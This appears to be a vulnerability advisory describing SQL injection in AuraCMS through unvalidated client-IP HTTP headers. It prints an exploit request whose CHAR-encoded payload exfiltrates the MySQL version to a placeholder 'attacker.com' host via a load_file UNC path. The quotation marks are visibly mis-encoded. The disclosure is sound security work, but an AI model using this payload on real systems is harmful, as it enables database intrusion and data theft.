High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in AuraCMS, which can be exploited to alter SQL queries and execute arbitrary SQL commands in applicationβs database.
1.2 The vulnerability exists due to insufficient validation of βCLIENT_IPβ, βX_FORWARDED_FORβ, βX_FORWARDEDβ, βFORWARDED_FORβ, βFORWARDEDβ HTTP headers in β/index.phpβ script. A remote authenticated attacker can execute arbitrary SQL commands in applicationβs database.
The exploitation example below displays version of MySQL server:
GET / HTTP/1.1
CLIENT_IP: β),(β',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))) β 2